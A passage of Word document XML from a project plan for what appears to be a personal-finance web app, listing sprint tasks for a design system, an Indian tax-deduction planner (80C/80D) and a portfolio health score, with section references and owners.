            <w:tcW w:type="dxa" w:w="16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§2.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 3 — Design System (Weeks 5–6)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add DM Sans + DM Mono font imports to styles.css</w:t>
            </w:r>
          </w:p>
        </w:tc>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§6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Replace :root variables with 3-tier token system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add card-data, card-hero, card-glass variant classes</w:t>
            </w:r>
          </w:p>
        </w:tc>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§6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Replace all .glass-card usages with correct variants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create shared SpinnerComponent and replace all spinners</w:t>
            </w:r>
          </w:p>
        </w:tc>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§6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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3.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Create shared EmptyStateComponent and use in 5 routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Update button sizes to new system (36px / 30px / 44px)</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.4 Enh. Doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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3.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Fix mobile nav tap targets to 48px minimum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§8.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 4 — Tax Intelligence (Weeks 7–8)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create TaxSummaryDto and TaxLineItemDto</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Implement TaxIntelligenceService with 80C/80D logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add /api/taxintelligence controller and endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Create tax-planner.component.ts Angular component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add /tax-planner route to app.routes.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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4.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add Tax Planner link to navbar navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-5" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 5 — Portfolio Health Score (Weeks 9–10)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
